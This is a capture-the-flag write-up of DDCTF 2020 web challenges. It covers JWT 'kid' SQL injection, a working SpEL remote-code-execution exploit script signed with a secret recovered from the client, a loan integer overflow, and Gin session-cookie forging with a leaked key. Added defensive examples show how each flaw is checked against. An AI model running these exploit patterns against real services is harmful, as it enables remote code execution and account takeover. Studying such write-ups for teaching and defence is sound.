DDCTF | iluem'Blog

DDCTF

Published: 2020-09-07  Category: Web


Web Sign-in

[screenshot]

JWT forgery

username=1&pwd=1&token=eyJhbGciOiJIUzI1NiIsImtpZCI6IjAgdW5pb24gc2VsZWN0IDEiLCJ0eXAiOiJKV1QifQ.eyJ1c2VyTmFtZSI6IjEiLCJwd2QiOiIxIiwidXNlclJvbGUiOiJBRE1JTiIsImV4cCI6MTU5OTI3ODA1OH0.6DlTlDJm7AYu6KnvDsXgWAOfuAyKyemIKYT6UOh1AF4

This returns:

{"code":0,"message":"success","data":"client dowload url: http://117.51.136.197/B5Itb8dFDaSFWZZo/client"}
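Decoding the header of the token above gives {"alg":"HS256","kid":"0 union select 1","typ":"JWT"}: the key identifier is where the injection sits. The following Python is an added example, not code from this post, that decodes a token without trusting it, flags a kid that is not an opaque identifier, and resolves kid through a fixed key table (never through a query built from it) before checking the HS256 signature. The key table, the "example-key-1" identifier and its secret are constructed for this example.

```python
import base64
import hmac
import json
import re
from hashlib import sha256

# Token from the request above (its header carries kid "0 union select 1").
CHALLENGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsImtpZCI6IjAgdW5pb24gc2VsZWN0IDEiLCJ0eXAiOiJKV1QifQ."
    "eyJ1c2VyTmFtZSI6IjEiLCJwd2QiOiIxIiwidXNlclJvbGUiOiJBRE1JTiIsImV4cCI6MTU5OTI3ODA1OH0."
    "6DlTlDJm7AYu6KnvDsXgWAOfuAyKyemIKYT6UOh1AF4"
)

# Constructed key table (kid -> HMAC secret). A real service loads this from its key store;
# the point is that kid is only ever used as a dictionary key, never spliced into a query.
KEY_TABLE = {"example-key-1": b"constructed-secret-for-this-example"}

# A legitimate kid is an opaque identifier; anything outside this shape is hostile input.
KID_PATTERN = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url JWT segment."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt(token: str):
    """Split a compact JWS into (header, payload, signature bytes) WITHOUT verifying it."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
        b64url_decode(sig_b64),
    )


def kid_is_suspicious(kid) -> bool:
    """True when kid is absent, not a string, or not a plain identifier (spaces, quotes, SQL...)."""
    return not (isinstance(kid, str) and KID_PATTERN.fullmatch(kid))


def verify_hs256(token: str, key_table=KEY_TABLE) -> bool:
    """Accept only alg=HS256, a well-formed kid that exists in the table, and a matching MAC."""
    try:
        header, _, signature = decode_jwt(token)
    except (ValueError, UnicodeDecodeError):
        return False
    if header.get("alg") != "HS256" or kid_is_suspicious(header.get("kid")):
        return False
    key = key_table.get(header["kid"])
    if key is None:
        return False
    signing_input = token.rsplit(".", 1)[0].encode("ascii")
    expected = hmac.new(key, signing_input, sha256).digest()
    return hmac.compare_digest(expected, signature)


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Mint an HS256 token; used here only to produce a legitimate token for comparison."""
    segments = [b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
                for part in (header, payload)]
    signing_input = ".".join(segments).encode("ascii")
    mac = hmac.new(key, signing_input, sha256).digest()
    return ".".join(segments + [b64url_encode(mac)])


if __name__ == "__main__":
    hdr, body, _ = decode_jwt(CHALLENGE_TOKEN)
    print("header :", hdr)
    print("payload:", body)
    print("kid suspicious:", kid_is_suspicious(hdr.get("kid")))
    print("accepted:", verify_hs256(CHALLENGE_TOKEN))
```

Run directly, it prints the decoded header and payload (userRole is already ADMIN in the unverified claims) and rejects the challenge token before any key is touched, because the kid fails the identifier check. The same verifier accepts a token it minted itself under "example-key-1" and refuses that token once its payload segment is swapped.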

Download the client; it is an executable.

Running it looks like this:

[screenshot]

The flag is at /home/dc2-user/flag/flag.txt

The signature format is command|timestamp

I handed it to iyzyi for analysis. He said it was a sha256+base64 signature, and there was also a string DDCTFWithYou whose purpose was unclear. Plain sha256+base64 did not work; in the end it turned out to be HMAC-SHA256. Searching for "sha256+base64 signature" turns up the relevant material:

https://cloud.tencent.com/document/product/228/10771

Then I tested it and it worked.

After that there is a SpEL template injection.

I referred to an article by K0rz3n.

The final exploit:

import hmac
import base64
import time
from hashlib import sha256
import requests
import json

t = str(int(time.time()))
# SpEL expression; the concat chain spells out the path below one character at a time
command = '''T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(102)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())'''
# /home/dc2-user/flag/flag.txt
tmp = command + "|" + t                 # the signed string is command|timestamp
appsecret = b"DDCTFWithYou"             # secret key found while analysing the client
data = bytes(tmp, encoding='utf-8')     # data to sign
signature = base64.b64encode(hmac.new(appsecret, data, digestmod=sha256).digest())
signature = str(signature, encoding='utf-8')
datas = json.dumps({"signature": signature, "command": command, "timestamp": t})
url = 'http://117.51.136.197/server/command'
r = requests.post(url, data=datas)
print(r.text)
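The server-side counterpart of the signing scheme above, written here as an added example and not taken from the challenge: it recomputes the HMAC-SHA256 over command|timestamp and compares it in constant time, refuses timestamps outside a short window so a captured signed request stops working once it ages, and then matches the command against a fixed list instead of handing the field to an expression evaluator. The secret, the 60-second window and the allowlist are constructed values for this example; the real secret has to stay on the server, since a copy inside the client (as with DDCTFWithYou) lets anyone produce valid signatures.

```python
import base64
import hmac
import json
import time
from hashlib import sha256
from typing import Tuple

# Constructed placeholder; the real secret must live on the server only.
SERVER_SECRET = b"constructed-server-secret"
# Requests whose timestamp is further than this from server time are refused (assumed value).
MAX_SKEW_SECONDS = 60
# Assumed allowlist: the command field is compared literally, never evaluated as an expression.
ALLOWED_COMMANDS = {"status", "version"}


def sign(command: str, timestamp: str, secret: bytes = SERVER_SECRET) -> str:
    """base64(HMAC-SHA256(secret, command|timestamp)), the scheme the client above uses."""
    mac = hmac.new(secret, f"{command}|{timestamp}".encode("utf-8"), sha256).digest()
    return base64.b64encode(mac).decode("ascii")


def verify_request(body: str, now: float, secret: bytes = SERVER_SECRET) -> Tuple[bool, str]:
    """Validate a JSON body {"signature","command","timestamp"}; returns (accepted, reason)."""
    try:
        req = json.loads(body)
        command, timestamp, signature = req["command"], req["timestamp"], req["signature"]
    except (ValueError, KeyError, TypeError):
        return False, "malformed request"
    if not all(isinstance(v, str) for v in (command, timestamp, signature)):
        return False, "wrong field types"
    # 1. Integrity: constant-time compare of the expected and presented MACs.
    expected = sign(command, timestamp, secret).encode("utf-8")
    if not hmac.compare_digest(expected, signature.encode("utf-8")):
        return False, "bad signature"
    # 2. Freshness: the MAC binds the timestamp, so an old capture fails here.
    if not timestamp.isdigit() or abs(now - int(timestamp)) > MAX_SKEW_SECONDS:
        return False, "timestamp outside window"
    # 3. Semantics: only known commands, matched as plain strings.
    if command not in ALLOWED_COMMANDS:
        return False, "command not allowed"
    return True, "ok"


if __name__ == "__main__":
    ts = str(int(time.time()))
    body = json.dumps({"command": "status", "timestamp": ts, "signature": sign("status", ts)})
    print(verify_request(body, time.time()))
```

The order matters: the signature is checked first so that nothing later in the handler ever runs on unauthenticated input, and the allowlist is the last gate, which is what makes a correctly signed SpEL expression worthless even when the secret has leaked.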

Card Shop

[screenshot]

The hint says 100 cards can be exchanged for a gift, but the deadline is only about two or three minutes away. Playing by the game's own rules there is no way to collect 100 cards in that time.

But borrowing a very large amount seems to overflow: loans?loans=9999999999999, after which we have enough money to buy.
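The post does not show the shop's server code, so the following Python is an added model rather than the challenge's own logic. It assumes the wallet balance is a 64-bit integer and that a loan is credited by plain addition, then contrasts wrapping arithmetic (what an unchecked int64 does) with a handler that parses the loans parameter strictly, bounds the requested amount and total debt, and refuses any result that would leave the int64 range. The per-request and total-debt limits are assumed values.

```python
INT64_MAX = 2**63 - 1
INT64_MIN = -(2**63)

# Constructed policy limits; a real shop would define its own.
MAX_LOAN_PER_REQUEST = 10_000
MAX_TOTAL_DEBT = 100_000


def wrap_int64(value: int) -> int:
    """Reduce an unbounded Python int to the value a wrapping int64 would hold."""
    return ((value + 2**63) % 2**64) - 2**63


def borrow_unchecked(wallet: dict, amount: int) -> dict:
    """Model of a loan handler that trusts the request: balance and debt simply wrap."""
    return {
        "money": wrap_int64(wallet["money"] + amount),
        "debt": wrap_int64(wallet["debt"] + amount),
    }


def parse_loan_amount(raw: str) -> int:
    """Parse the loans query parameter strictly: decimal digits only, length-bounded first."""
    if not raw.isdigit() or len(raw) > len(str(MAX_LOAN_PER_REQUEST)):
        raise ValueError("invalid loans parameter")
    return int(raw)


def borrow_checked(wallet: dict, amount: int) -> dict:
    """Validate the request, then refuse any arithmetic that would leave the int64 range."""
    if not isinstance(amount, int) or isinstance(amount, bool):
        raise ValueError("amount must be an integer")
    if amount <= 0 or amount > MAX_LOAN_PER_REQUEST:
        raise ValueError("amount outside the allowed range")
    new_debt = wallet["debt"] + amount
    if new_debt > MAX_TOTAL_DEBT:
        raise ValueError("total debt limit exceeded")
    new_money = wallet["money"] + amount
    # Python ints do not overflow, so the range check has to be explicit before storing.
    if not (INT64_MIN <= new_money <= INT64_MAX and INT64_MIN <= new_debt <= INT64_MAX):
        raise OverflowError("balance would overflow int64")
    return {"money": new_money, "debt": new_debt}


def loan_request_accepted(wallet: dict, raw_amount: str) -> bool:
    """End-to-end decision a handler would make for a loans parameter; False means reject."""
    try:
        borrow_checked(wallet, parse_loan_amount(raw_amount))
        return True
    except (ValueError, OverflowError):
        return False


if __name__ == "__main__":
    rich = {"money": INT64_MAX - 5, "debt": 0}
    print("unchecked:", borrow_unchecked(rich, 10))          # balance goes negative
    print("checked  :", loan_request_accepted(rich, "10"))   # False, request refused
    print("oversized:", loan_request_accepted({"money": 100, "debt": 0}, "9999999999999"))
```

The length check in parse_loan_amount rejects the 13-digit value from the write-up before it is ever converted, and borrow_checked catches the remaining case where a small, individually valid loan would still push a large balance past INT64_MAX.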

[screenshot]

After clicking exchange:

[screenshot]

Hint: "Congratulations, you bought the gift. Inside are sandwich biscuits, gin, and a small note that reads: url: /flag , SecKey: Udc13VD5adM_c10nPxFu@v12. Can you work out what it means?"

[screenshot]

The gin refers to Go's gin framework. Next, take out the tool written by iv4n and rewrite the session in one go.

root@kali:~# ./faker dec -c "MTU5OTM3MTA2MXxEdi1CQkFFQ180SUFBUkFCRUFBQV81cl9nZ0FDQm5OMGNtbHVad3dJQUFaM1lXeHNaWFFHYzNSeWFXNW5ER01BWVhzaWIzZHBibWR6SWpwYlhTd2lhVzUyWlhOMGN5STZXMTBzSW0xdmJtVjVJam81T1RrNU9UazRNVEkxTURnd016Z3pMQ0p1YjNkZmRHbHRaU0k2TVRVNU9UTTNNRGszTlN3aWMzUmhjblJmZEdsdFpTSTZNVFU1T1RNM01EYzVOWDBHYzNSeWFXNW5EQWNBQldGa2JXbHVCR0p2YjJ3Q0FnQUF8syX_1eT-vi_9JYZ5XR8hbomW0lRg7HQ-f896e1YlNQk=" 
map[admin:false wallet:{"owings":[],"invests":[],"money":9999998125080383,"now_time":1599370975,"start_time":1599370795}]
type detail: 
{
    admin[string]: false[bool],
    wallet[string]: {"owings":[],"invests":[],"money":9999998125080383,"now_time":1599370975,"start_time":1599370795}[string],
}

Set an admin session:

root@kali:~# ./faker enc -n "session" -k "Udc13VD5adM_c10nPxFu@v12" -o "{admin: true[bool]}"
MTU5OTM3MTgzMXxFXy1CQkFFQkEwOWlhZ0hfZ2dBQkVBRVFBQUFkXzRJQUFRWnpkSEpwYm1jTUJ3QUZZV1J0YVc0RVltOXZiQUlDQUFFPXzYYKFyR_6b58VGMVEMyyo4S4AwUcXMEVAiF1VqOCXQvw==

and you get the flag.
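What the faker tool is doing above can be followed by hand. The following Python is an added example, not the tool or the challenge code: it splits a cookie laid out the way gorilla/securecookie builds it, base64(timestamp|base64(serialized value)|MAC) with the HMAC-SHA256 computed over name|timestamp|value, so a defender can see that the session contents are readable by anyone holding the cookie (only integrity is protected, nothing is encrypted) and that whoever holds the single hash key can sign any value. The verify and encode functions and the "demo-secret" key are this example's own; it is run against the session cookie from the post and against a cookie it produces itself.

```python
import base64
import hmac
from hashlib import sha256
from typing import Tuple

# Session cookie copied from the write-up above.
CHALLENGE_COOKIE = (
    "MTU5OTM3MTA2MXxEdi1CQkFFQ180SUFBUkFCRUFBQV81cl9nZ0FDQm5OMGNtbHVad3dJQUFaM1lXeHNaWFFHYzNSeWFXNW5ER01BWVhz"
    "aWIzZHBibWR6SWpwYlhTd2lhVzUyWlhOMGN5STZXMTBzSW0xdmJtVjVJam81T1RrNU9UazRNVEkxTURnd016Z3pMQ0p1YjNkZmRHbHRa"
    "U0k2TVRVNU9UTTNNRGszTlN3aWMzUmhjblJmZEdsdFpTSTZNVFU1T1RNM01EYzVOWDBHYzNSeWFXNW5EQWNBQldGa2JXbHVCR0p2YjJ3"
    "Q0FnQUF8syX_1eT-vi_9JYZ5XR8hbomW0lRg7HQ-f896e1YlNQk="
)

# Cookie name the store was created with (the faker invocation above passes -n "session").
SESSION_NAME = "session"


def _b64decode_any(s: str) -> bytes:
    """Decode URL-safe base64 with or without padding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def split_cookie(cookie: str) -> Tuple[int, str, bytes]:
    """Split base64(timestamp|value|mac) into (timestamp, value still base64, raw mac)."""
    raw = _b64decode_any(cookie)
    ts, value, mac = raw.split(b"|", 2)   # maxsplit=2: the raw MAC may itself contain '|'
    return int(ts), value.decode("ascii"), mac


def session_payload(cookie: str) -> bytes:
    """The serialized session exactly as stored: no key is needed to read it."""
    _, value, _ = split_cookie(cookie)
    return _b64decode_any(value)


def verify_cookie(cookie: str, hash_key: bytes, name: str = SESSION_NAME) -> bool:
    """The server-side check: HMAC-SHA256 over name|timestamp|value, compared in constant time."""
    try:
        ts, value, mac = split_cookie(cookie)
    except (ValueError, UnicodeDecodeError):
        return False
    expected = hmac.new(hash_key, f"{name}|{ts}|{value}".encode("ascii"), sha256).digest()
    return hmac.compare_digest(expected, mac)


def encode_cookie(payload: bytes, hash_key: bytes, timestamp: int, name: str = SESSION_NAME) -> str:
    """Build a cookie in the same layout; shows that the hash key alone decides what is accepted."""
    value = base64.urlsafe_b64encode(payload).decode("ascii")
    signed = f"{name}|{timestamp}|{value}".encode("ascii")
    mac = hmac.new(hash_key, signed, sha256).digest()
    # The cookie drops the leading "name|" and appends the MAC after a trailing pipe.
    return base64.urlsafe_b64encode(signed[len(name) + 1:] + b"|" + mac).decode("ascii")


if __name__ == "__main__":
    ts, _, mac = split_cookie(CHALLENGE_COOKIE)
    print("issued at:", ts, " mac bytes:", len(mac))
    print("payload  :", session_payload(CHALLENGE_COOKIE))   # readable gob with the JSON wallet inside
    demo = encode_cookie(b'{"admin":false}', b"demo-secret", ts)
    print("demo verifies with right key:", verify_cookie(demo, b"demo-secret"))
    print("demo verifies with wrong key:", verify_cookie(demo, b"other-secret"))
```

Two things follow for anyone running such a store: nothing secret belongs in the session value itself, because the cookie is plaintext to its holder, and the hash key is the whole trust boundary, so once it has been disclosed (here, printed inside a gift message) every cookie signed under it has to be treated as attacker-controlled until the key is rotated.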

[screenshot]
